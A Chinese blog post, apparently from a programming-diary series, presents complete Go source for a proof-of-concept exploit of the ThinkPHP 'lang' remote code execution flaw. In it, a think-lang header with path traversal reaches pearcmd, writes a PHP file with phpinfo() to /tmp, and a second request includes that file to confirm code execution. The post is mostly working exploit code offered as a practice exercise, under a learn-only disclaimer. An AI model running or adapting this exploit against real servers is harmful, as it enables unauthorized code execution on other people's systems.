脚本编写学习日记:Go(5)

本文介绍了使用Go语言进行接口嵌套来改进ThinkPHPLangRemoteCodeExecution(RCE)漏洞的ProofofConcept(POC)。作者通过创建多个接口和结构体,实现了对单一URL的POC检查功能的模块化。在`main`函数中,首先调用`check1`检测代码,如果返回状态码为200,则执行`check2`进行进一步检查。代码包含`partfirst`和`partsecond`两个包,分别处理不同部分的漏洞检测逻辑。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

刚学习了go的接口嵌套的写法,练习将之前写的脚本(编写学习日记:Go(4))中单个thinkphp_lang_rce漏洞poc(单个url)进行了改进(单纯为了练手)

注意:本文内容仅供学习交流,禁止用于其他用途,学习后请及时删除,禁止任何公司或个人发布与传播

结构:

 main.go

package main

import (
	"flag"
	"thinkphp-change/partfirst"
	"thinkphp-change/partsecond"
)

var (
	url string
)

func init() {
	flag.StringVar(&url, "u", "", "Enter the url")
}

type Checkname struct {
	url string
}

type Usercheck interface {
	Getpoc(url string) int
}

type Checkone interface {
	check(url string)
}

type Checkall interface {
	Usercheck
	Checkone
}

func (r Checkname) check1() int {
	flag.Parse()
	codePart := partfirst.Checkname{}
	code := codePart.Getpoc(url)
	return code
}
func (r Checkname) check2() {
	flag.Parse()
	checkpart := partsecond.Checkname{}
	checkpart.Check(url)
}

func main() {
	flag.Parse()
	var r Checkname
	code := r.check1()
	if code == 200 {
		r.check2()
	}
}

partfirst.go

package partfirst

import (
	"fmt"
	"net/http"
	"strings"
)

type Checkname struct {
	url string
}

func (r Checkname) Getpoc(url string) int {
	data := ""
	url_poc := url + "?+config-create+/<?=phpinfo()?>+/tmp/test.php"
	req, err := http.NewRequest("GET", url_poc, strings.NewReader(data))
	if err != nil {
		fmt.Println(err)
	}
	req.Header.Add("think-lang", "../../../../../../../../usr/local/lib/php/pearcmd")
	req.Header.Add("Cookie", "think_lang=zh-cn")
	rep, err := http.DefaultClient.Do(req)
	if err != nil {
		fmt.Println(err)
	}
	defer rep.Body.Close()
	return rep.StatusCode
}

partsecond.go

package partsecond

import (
	"fmt"
	"io/ioutil"
	"net/http"
	"strings"
)

type Checkname struct {
	url string
}

func (r Checkname) Check(url string) {
	url_poc1 := url //+ "/index.php"
	data1 := ""
	req1, err := http.NewRequest("GET", url_poc1, strings.NewReader(data1))
	if err != nil {
		fmt.Println(err)
	}
	req1.Header.Add("think-lang", "../../../../../../../../tmp/test")
	rep1, err := http.DefaultClient.Do(req1)
	if err != nil {
		fmt.Println(err)
	}
	defer rep1.Body.Close()
	rep1body, err := ioutil.ReadAll(rep1.Body)
	if err != nil {
		fmt.Println(err)
	}
	rep1bodys := string(rep1body)
	if strings.Contains(rep1bodys, "Version") && strings.Contains(rep1bodys, "PHP") {
		fmt.Println("True")
	}
}

效果:

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值